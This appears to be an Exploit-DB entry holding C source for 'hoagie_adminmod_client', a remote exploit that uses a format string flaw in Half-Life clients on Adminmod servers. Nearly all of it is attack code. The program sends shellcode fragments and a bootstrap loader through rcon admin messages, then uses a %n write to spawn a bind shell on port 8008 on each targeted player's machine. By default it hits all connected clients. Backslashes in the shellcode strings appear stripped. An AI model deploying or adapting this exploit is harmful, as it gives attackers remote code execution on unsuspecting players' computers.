https://www.exploit-db.com/exploits/22142

漏洞细节尚未披露

// source: http://www.securityfocus.com/bid/6582/info

// It has been reported that the Half-Life client contains a format string vulnerability. When receiving messages from an administrator through the adminmod add-on package, the client does not properly handle input. This could result in denial of service, or code execution. 

/*****************************************************************
  * hoagie_adminmod_client.c
  *
  * Remote exploit for Halflife-Clients playing on a server running
  * the Adminmod plugin.
  *
  * Spawns a shell at 8008/tcp.
  *
  * Author: [email protected]
  *
  * Credits:
  *    void.at
  *    Taeho Oh for using parts of his shellcode-connection code.
  *    deepzone.org for their shellcode-generator
  *
  * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
  * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
  * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
  *
  *****************************************************************/

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>

char server_ip[20];
char rcon_pwd[30];
int server_port;
char player_nick[30];

#define STRADDR 0x19d4588

/*
-- portable NT/2k/XP ShellCode features ... www.deepzone.org

LoadLibraryA   IT address     004AC2E0h
GetProcAddress IT address     004AC164h
XOR byte                      9Fh
Remote port                   8008
Style                         C

ATTENTION code modified by greuff: 0xff in the first line
changed to 0xfe because the HL-client filters out this
character.

Wrote a short bootstrap loader that changes this byte
again to 0xff. (dec %esp, dec %esp, dec %esp, dec %esp,
pop %esi, incb 0xf(%esi))

It additionally corrects the single '%' in the code that
is filtered out by the format-string-function. (offset 0x65)

Works only when the code gets executed by a ret! (buffer-
address has to lie on the stack)

*/

// total length: 1226 bytes
char *shellcode[] = {
"x90x90x90x4cx4cx4cx4cx5exfex46x15xfex46x6b"
"x68x5ex56xc3x90x54x59xfexd1x58x33xc9xb1x1c"
"x90x90x90x90x03xf1x56x5fx33xc9x66xb9x95x04"
"x90x90x90xacx34x9fxaaxe2xfax77x9fx9fx9fx9f",

"xc2x1ex72x46xbexdfx9fx12x2ax6dxbbxdfx9fx12"
"x22x65xbbxdfx9fxf5x98x0fx0fx0fx0fxc6x77x4d"
"x9dx9fx9fx12x2axb5xbaxdfx9fx12x22xacxbaxdf"
"x9fxf5x95x0fx0fx0fx0fxc6x77x24x9dx9fx9fxf5",

"x9fx12x2ax46xbaxdfx9fxc9x12x2ax7axbaxdfx9f"
"xc9x12x2ax76xbaxdfx9fxc9x60x0axacxbaxdfx9f"
"xf5x9fx12x2ax46xbaxdfx9fxc9x12x2ax72xbaxdf"
"x9fxc9x12x2ax6exbaxdfx9fxc9x60x0axacxbaxdf",

"x9fx58x1ax6axbaxdfx9fxdbx9fx9fx9fx12x2ax6a"
"xbaxdfx9fxc9x60x0axa8xbaxdfx9fx12x2axb2xb9"
"xdfx9fx32xcfx60x0axccxbaxdfx9fx12x2axaexb9"
"xdfx9fx32xcfx60x0axccxbaxdfx9fx12x2ax6exba",

"xdfx9fx12x22xb2xb9xdfx9fx3ax12x2ax7axbaxdf"
"x9fx32x12x22xaexb9xdfx9fx34x12x22xaaxb9xdf"
"x9fx34x58x1axbaxb9xdfx9fx9fx9fx9fx9fx58x1a"
"xbexb9xdfx9fx9ex9ex9fx9fx12x2axa6xb9xdfx9f",

"xc9x12x2ax6axbaxdfx9fxc9xf5x9fxf5x9fxf5x8f"
"xf5x9exf5x9fxf5x9fx12x2axd6xb9xdfx9fxc9xf5"
"x9fx60x0axa4xbaxdfx9fxf7x9fxbfx9fx9fx0fxf7"
"x9fx9dx9fx9fx60x0axdcxbaxdfx9fx16x1axcexb9",

"xdfx9fxacx5fxcfxdfxcfxdfxcfx60x0ax65xbbxdf"
"x9fxcfxc4xf5x8fx12x2ax56xbaxdfx9fxc9xccx60"
"x0ax61xbbxdfx9fxf5x9cxccx60x0ax9dxbaxdfx9f"
"x12x2axcaxb9xdfx9fxc9x12x2ax56xbaxdfx9fxc9",

"xccx60x0ax99xbaxdfx9fx12x22xc6xb9xdfx9fx34"
"xacx5fxcfx12x22xfaxb9xdfx9fxc8xcfxcfxcfx12"
"x2ax76xbaxdfx9fx32xcfx60x0axa0xbaxdfx9fxf5"
"xafx60x0axd0xbaxdfx9fx74xd2x0fx0fx0fxacx5f",

"xcfx12x22xfaxb9xdfx9fxc8xcfxcfxcfx12x2ax76"
"xbaxdfx9fx32xcfx60x0axa0xbaxdfx9fxf5xcfx60"
"x0axd0xbaxdfx9fx1cx22xfaxb9xdfx9fx9dx90x1d"
"x88x9ex9fx9fx1ex22xfaxb9xdfx9fx9exbfx9fx9f",

"xedx91x0fx0fx0fx0fx58x1axfaxb9xdfx9fx9fxbf"
"x9fx9fxf5x9fx14x1axfaxb9xdfx9fx12x22xfaxb9"
"xdfx9fxc8xcfx14x1axcexb9xdfx9fxcfx12x2ax76"
"xbaxdfx9fx32xcfx60x0axd8xbaxdfx9fxf5xcfx60",

"x0axd0xbaxdfx9fx14x1axfaxb9xdfx9fxf5x9fxcf"
"x12x2axcexb9xdfx9fx32xcfx12x2axc6xb9xdfx9f"
"x32xcfx60x0ax95xbaxdfx9fxf5x9fx12x22xfaxb9"
"xdfx9fxc8xf5x9fxf5x9fxf5x9fx12x2ax76xbaxdf",

"x9fx32xcfx60x0axa0xbaxdfx9fxf5xcfx60x0axd0"
"xbaxdfx9fxacx56xa6x12xfaxb9xdfx9fx90x18xf8"
"x60x60x60xf5x9fxf7x9fxbfx9fx9fx0fx12x2axce"
"xb9xdfx9fx32xcfx12x2axc6xb9xdfx9fx32xcfx60",

"x0ax91xbaxdfx9fx16x1axfexb9xdfx9fxf5x9fx12"
"x22xfaxb9xdfx9fxc8xcfx12x2axcexb9xdfx9fx32"
"xcfx12x2ax72xbaxdfx9fx32xcfx60x0axd4xbaxdf"
"x9fxf5xcfx60x0axd0xbaxdfx9fxf5x9fx14x1axfe",

"xb9xdfx9fx12x22xfaxb9xdfx9fxc8xcfx14x1axce"
"xb9xdfx9fxcfx12x2ax76xbaxdfx9fx32xcfx60x0a"
"xd8xbaxdfx9fxf5xcfx60x0axd0xbaxdfx9fx76x26"
"x61x60x60x12x2axc6xb9xdfx9fx32xcfx60x0ax8d",

"xbaxdfx9fx12x2axc2xb9xdfx9fx32xcfx60x0ax8d"
"xbaxdfx9fxf5x9fx60x0axc8xbaxdfx9fxcexc9xf7"
"x7fx5dxd5x9fx0fxc5x60x8dxcfxc4xc6xc8xc1xce"
"xc9xccxf7xfbx5exd5x9fx0fxc5x60x8dxcfx33x1b",

"x5fxeax64xc7x34xc6x7dx76x5cxc8xccxd0xdcxd4"
"xacxadx9fxecxf0xfcxf4xfaxebx9fxfdxf6xf1xfb"
"x9fxf3xf6xecxebxfaxf1x9fxfexfcxfcxfaxefxeb"
"x9fxecxfaxf1xfbx9fxedxfaxfcxe9x9fxfcxf3xf0",

"xecxfaxecxf0xfcxf4xfaxebx9fxd4xdaxcdxd1xda"
"xd3xacxadx9fxdcxedxfaxfexebxfaxcfxf6xefxfa"
"x9fxd8xfaxebxccxebxfexedxebxeaxefxd6xf1xf9"
"xf0xdex9fxdcxedxfaxfexebxfaxcfxedxf0xfcxfa",

"xecxecxdex9fxcfxfaxfaxf4xd1xfexf2xfaxfbxcf"
"xf6xefxfax9fxd8xf3xf0xfdxfexf3xdexf3xf3xf0"
"xfcx9fxcdxfaxfexfbxd9xf6xf3xfax9fxc8xedxf6"
"xebxfaxd9xf6xf3xfax9fxccxf3xfaxfaxefx9fxdc",

"xf3xf0xecxfaxd7xfexf1xfbxf3xfax9fxdaxe7xf6"
"xebxcfxedxf0xfcxfaxecxecx9fxdcxf0xfbxfaxfb"
"xbfxfdxe6xbfxe3xc5xfexf1xbfxa3xf6xe5xfexf1"
"xdfxfbxfaxfaxefxe5xf0xf1xfaxb1xf0xedxf8xa1",

"x9dx9fx80xd7x9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx93x9fx9fx9fx9fx9fx9fx9fx9ex9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f",

"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f",

"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fxdcxd2xdbxb1xdaxc7xdax9fx9fx9fx9fx9f"
"x8fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx96x96x96x96x96x90x90x90"};  // = 22 blocks

char loader[]=
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x4cx4cx4cx4cx5ax31xc9xb1x27x42xe2"
"xfdx52x31xc0x31xc9x66xbbx38x16x88xf9x51x88"
"xd9x40x8ax3cx42x88x3ax42xe2xf8x59xe2xf1xc3";

void create_conn(int *sock, char *host, int port)
{
    struct sockaddr_in sin;
    sin.sin_family=AF_INET;
    sin.sin_port=htons(port);
    if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
    if((*sock=socket(PF_INET,SOCK_DGRAM,0))<0) perror("socket"), exit(1);
}

void lowlevel_rcon(int sock, char *host, int port, char *cmd, char *reply)
{
    char msg[100000];
    struct sockaddr_in sin;
    struct sockaddr_in sfrom;
    fd_set fdset;
    int dummy;

    sin.sin_family=AF_INET;
    sin.sin_port=htons(port);
    if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);

    sprintf(msg,"%c%c%c%c%s",0xff,0xff,0xff,0xff,cmd);
    if(sendto(sock,msg,strlen(msg),0,(struct sockaddr *)&sin,sizeof(sin))<0)
       perror("sendto"), exit(1);

    if(reply)
    {
       if(recvfrom(sock,msg,2000,0,(struct sockaddr *)&sfrom,&dummy)<0)
          perror("recvfrom"), exit(1);

       if(strncmp(msg,"xFFxFFxFFxFF",4))
          fprintf(stderr,"protocol error: replyn"), exit(1);

       strcpy(reply,msg+4);
    }
}

void send_rcon(int sock, char *host, int port, char *rconpwd, char *cmd, char *reply_fun)
{
    char reply[1000];
    char msg[100000];

    lowlevel_rcon(sock,host,port,"challenge rcon",reply);
    if(!strstr(reply,"challenge rcon "))
       fprintf(stderr,"protocol errorn"), exit(1);
    reply[strlen(reply)-1]=0;

    sprintf(msg,"rcon %s "%s" %s",reply+strlen("challenge rcon "),rconpwd,cmd);
    if(reply_fun)
       lowlevel_rcon(sock,host,port,msg,reply);
    else
       lowlevel_rcon(sock,host,port,msg,NULL);
    if(reply_fun)
       strcpy(reply_fun,reply);
}

int main(int argc, char **argv)
{
    int sock, i,j;
    int anzsc;
    char reply[1000], command[100];
    char evil_message[100000];
    unsigned int offset, spaces;
    unsigned long addr;

    printf("hoagie_adminmod_client - remote exploit for half-life-clientsn");
    printf("by [email protected]");
    if(argc<4 || argc>5)
    {
       printf("Usage: %s server_ip server_port rcon_password [player_nick]nn",argv[0]);
       exit(1);
    }

    strcpy(server_ip,argv[1]);
    server_port=strtol(argv[2],NULL,10);
    strcpy(rcon_pwd,argv[3]);
    if(argc==5)
    {
       strcpy(player_nick,argv[4]);
       sprintf(command,"admin_command admin_psay "%s"",player_nick);
    }
    else
    {
       player_nick[0]=0;
       sprintf(command,"admin_command admin_ssay");
    }

    if(player_nick[0]==0)
    {
       printf("Sending to ALL clients! You have 3 sec to abort...n");
       sleep(3);
    }

    create_conn(&sock,server_ip,server_port);

    /********* Step 1 - send the complete shellcode and the loader to the big buffer ***********/

    offset=5000+112/2;
    spaces=0;
    for(i=21;i>=0;i--)
    {
       sprintf(evil_message,"%s ",command);
       for(j=0;j<spaces;j++)
          strcat(evil_message," ");
       sprintf(reply,"%%%du%s",offset,shellcode[i]);
       strcat(evil_message,reply);

       printf("Writing shellcode fragment at offset %d...n",offset);
       send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);
       offset-=strlen(shellcode[i])+2;   // including x0ax00
    }

    /********* Step 2 - send the shellcode bootstrap loader ***********/

    /* correct offset because the shell loader has the double size of a shellcode chunk */
    offset-=strlen(shellcode[0]);
    sprintf(evil_message,"%s ",command);
    for(j=0;j<spaces;j++)
       strcat(evil_message," ");
    sprintf(reply,"%%%du%s",offset,loader);
    strcat(evil_message,reply);

    printf("Writing bootstrap at offset %d...n",offset);
    send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);

    /********* Step 3 - construct the code that returns into the shellcode ************/

    addr=STRADDR+offset+73+spaces;
    sprintf(evil_message,"%s AA%c%c%c%c%c%c%%.f%%.f%%.f%%.f%%.f%%.%du%%n",
         command,
         0x68,addr&0xFF,(addr>>8)&0xFF,(addr>>16)&0xFF,(addr>>24)&0xFF,0xc3,734 /* 0x3cd-13 */);
    printf("Writing return into shellcode instructions...n");
    send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);

    close(sock);

    printf("Shell (hopefully) spawned at client host port 8008.n");
    return 0;
}